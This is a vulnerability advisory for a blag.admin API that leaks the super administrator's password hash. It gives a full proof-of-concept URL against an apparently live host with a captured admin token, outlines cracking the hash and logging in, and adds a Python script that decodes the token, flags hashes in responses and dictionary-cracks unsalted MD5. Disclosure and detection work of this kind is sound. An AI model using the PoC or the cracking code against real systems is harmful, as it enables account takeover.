Vulnerability Report: CVE-2026-30689 - Super Administrator Password Hash Leaked by the User-Info API
Vulnerability Type: Insecure Permissions
Affected version: blag.admin ≤ 8.0
Vulnerability Details: An attacker only has to request the exposed user-information API with a token parameter in the URL; no further authentication step or interaction is needed, and the endpoint returns the administrator's password hash directly in its response body. Because the token travels in the query string, it also ends up in proxy and server logs, where anyone with log access can replay it.
Discovered by: Lang
Reproduction Steps:
Vulnerable website: http://oa.joyalltire.com:2345/login?redirect=%2F
API path to append to the host: /api/user/getinfobytoken/?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9uYW1lIjoicmFhZG1pbiIsImp0aSI6IjEyIiwiaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93cy8yMDA4LzA2L2lkZW50aXR5L2NsYWltcy9leHBpcmF0aW9uIjoiMjAyNS83LzIzIDA6MTI6MTAiLCJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dzLzIwMDgvMDYvaWRlbnRpdHkvY2xhaW1zL3JvbGUiOiJTdXBlckFkbWluIiwibmJmIjoxNzUzMTk3MTMwLCJleHAiOjE3NTMyMDA3MzAsImlzcyI6IlJBLlBTUSIsImF1ZCI6IndyIn0.deNeMh8JdiOUEETIWynvfzTCw4GmxXMkYm0
Full PoC URL: http://oa.joyalltire.com:2345/api/user/getinfobytoken/?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9uYW1lIjoicmFhZG1pbiIsImp0aSI6IjEyIiwiaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93cy8yMDA4LzA2L2lkZW50aXR5L2NsYWltcy9leHBpcmF0aW9uIjoiMjAyNS83LzIzIDA6MTI6MTAiLCJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dzLzIwMDgvMDYvaWRlbnRpdHkvY2xhaW1zL3JvbGUiOiJTdXBlckFkbWluIiwibmJmIjoxNzUzMTk3MTMwLCJleHAiOjE3NTMyMDA3MzAsImlzcyI6IlJBLlBTUSIsImF1ZCI6IndyIn0.deNeMh8JdiOUEETIWynvfzTCw4GmxXMkYm0
The response to the URL above contains the super administrator's password hash directly. Decoding the token's payload (it is a plain base64url-encoded JWT, alg HS256) shows it was issued for user raadmin with role SuperAdmin and carries exp 1753200730, i.e. 2025-07-22 16:12:10 UTC (the "expiration" claim gives the same instant in UTC+8). Its signature segment is 35 base64url characters, whereas a complete HS256 tag encodes to 43, so the token was either truncated when the report was written or accepted by the endpoint without signature verification; anyone re-testing should check which.
The leaked hash can then be cracked offline:
Log in to the backend with the recovered password.
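The following script is an added example for this report, not code from the report or from blag.admin. It pulls the token out of the PoC URL printed above, decodes its claims without verifying them, checks the exp claim and the length of the signature segment, and then scans a JSON response body for values shaped like password hashes. POC_URL is the URL from the report; SAMPLE_RESPONSE, its field names, the assumption that the leaked hash is an unsalted MD5, and WORDLIST are all constructed for illustration, since the report shows the real response and the cracking step only as screenshots.

```python
"""Inspect the CVE-2026-30689 PoC token and flag password hashes in a response.

Added example; not code from the report or from blag.admin. POC_URL is the URL
printed in the report. SAMPLE_RESPONSE and WORDLIST are constructed.
"""
import base64
import hashlib
import json
import re
from datetime import datetime, timezone
from urllib.parse import parse_qs, urlparse

POC_URL = (
    "http://oa.joyalltire.com:2345/api/user/getinfobytoken/?token="
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9uYW1lIjoicmFhZG1pbiIsImp0aSI6IjEyIiwiaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93cy8yMDA4LzA2L2lkZW50aXR5L2NsYWltcy9leHBpcmF0aW9uIjoiMjAyNS83LzIzIDA6MTI6MTAiLCJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dzLzIwMDgvMDYvaWRlbnRpdHkvY2xhaW1zL3JvbGUiOiJTdXBlckFkbWluIiwibmJmIjoxNzUzMTk3MTMwLCJleHAiOjE3NTMyMDA3MzAsImlzcyI6IlJBLlBTUSIsImF1ZCI6IndyIn0."
    "deNeMh8JdiOUEETIWynvfzTCw4GmxXMkYm0"
)
HS256_TAG_BYTES = 32  # an HMAC-SHA256 tag is 32 bytes = 43 base64url characters


def token_from_url(url: str) -> str:
    """Pull the token query parameter out of the PoC URL."""
    return parse_qs(urlparse(url).query)["token"][0]


def b64url_decode(segment: str) -> bytes:
    """Decode one JWT segment, restoring the '=' padding that JWTs strip."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_jwt_unverified(token: str) -> dict:
    """Parse header and claims WITHOUT verifying the signature.
    For inspecting a captured token only; never authorize on claims read this way."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    return {
        "header": json.loads(b64url_decode(header_b64)),
        "claims": json.loads(b64url_decode(payload_b64)),
        "signature_bytes": len(b64url_decode(sig_b64)),
    }


def claim_by_suffix(claims: dict, suffix: str):
    """Fetch a claim by the tail of its URI-style name, e.g. '/role'."""
    return next((v for k, v in claims.items() if k.endswith(suffix)), None)


def token_report(token: str, now_ts: int) -> dict:
    """Who the token is for, when it expires (vs. the Unix time now_ts), and
    whether the signature segment is even long enough to be a full HS256 tag."""
    parsed = decode_jwt_unverified(token)
    claims = parsed["claims"]
    return {
        "alg": parsed["header"].get("alg"),
        "name": claim_by_suffix(claims, "/name"),
        "role": claim_by_suffix(claims, "/role"),
        "exp_utc": datetime.fromtimestamp(claims["exp"], tz=timezone.utc).isoformat(),
        "expired": now_ts > claims["exp"],
        "signature_complete": parsed["signature_bytes"] == HS256_TAG_BYTES,
    }


# Shapes of common password hashes; a user-info endpoint should return none of them.
HASH_PATTERNS = {
    "hex32 (md5/ntlm-like)": re.compile(r"^[0-9a-fA-F]{32}$"),
    "hex64 (sha256)": re.compile(r"^[0-9a-fA-F]{64}$"),
    "bcrypt": re.compile(r"^\$2[aby]\$\d{2}\$[./A-Za-z0-9]{53}$"),
}


def find_leaked_hashes(obj, path: str = "") -> list:
    """Walk a decoded JSON body; return (json_path, kind) for every string that
    looks like a password hash or sits under a password-named key."""
    hits = []
    if isinstance(obj, dict):
        for key, val in obj.items():
            hits += find_leaked_hashes(val, f"{path}.{key}" if path else key)
    elif isinstance(obj, list):
        for i, val in enumerate(obj):
            hits += find_leaked_hashes(val, f"{path}[{i}]")
    elif isinstance(obj, str):
        kind = next((k for k, pat in HASH_PATTERNS.items() if pat.match(obj)), None)
        if kind is None and "pass" in path.rsplit(".", 1)[-1].lower():
            kind = "value under password-named key"
        if kind is not None:
            hits.append((path, kind))
    return hits


def crack_unsalted_md5(hex_digest: str, wordlist):
    """Dictionary attack on an unsalted MD5: returning such a hash to a caller
    is, in practice, the same as returning the password. None if no word matches."""
    target = hex_digest.lower()
    return next((w for w in wordlist if hashlib.md5(w.encode()).hexdigest() == target), None)


# Constructed sample response: hypothetical field names, hash is MD5("123456").
SAMPLE_RESPONSE = {"code": 200, "data": {"id": 12, "userName": "raadmin",
                   "role": "SuperAdmin", "password": "e10adc3949ba59abbe56e057f20f883e"}}
WORDLIST = ["admin", "password", "123456", "admin123"]  # constructed

if __name__ == "__main__":
    print(token_report(token_from_url(POC_URL), int(datetime.now(timezone.utc).timestamp())))
    for json_path, kind in find_leaked_hashes(SAMPLE_RESPONSE):
        print(f"leaked hash at {json_path}: {kind}")
    print("cracks to:", crack_unsalted_md5(SAMPLE_RESPONSE["data"]["password"], WORDLIST))
```

Run it against a real response by replacing SAMPLE_RESPONSE with the parsed JSON; find_leaked_hashes is the check a blue team can drop into an API-response test to make sure no credential-shaped value ever leaves a user-info endpoint, whatever the caller's role.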
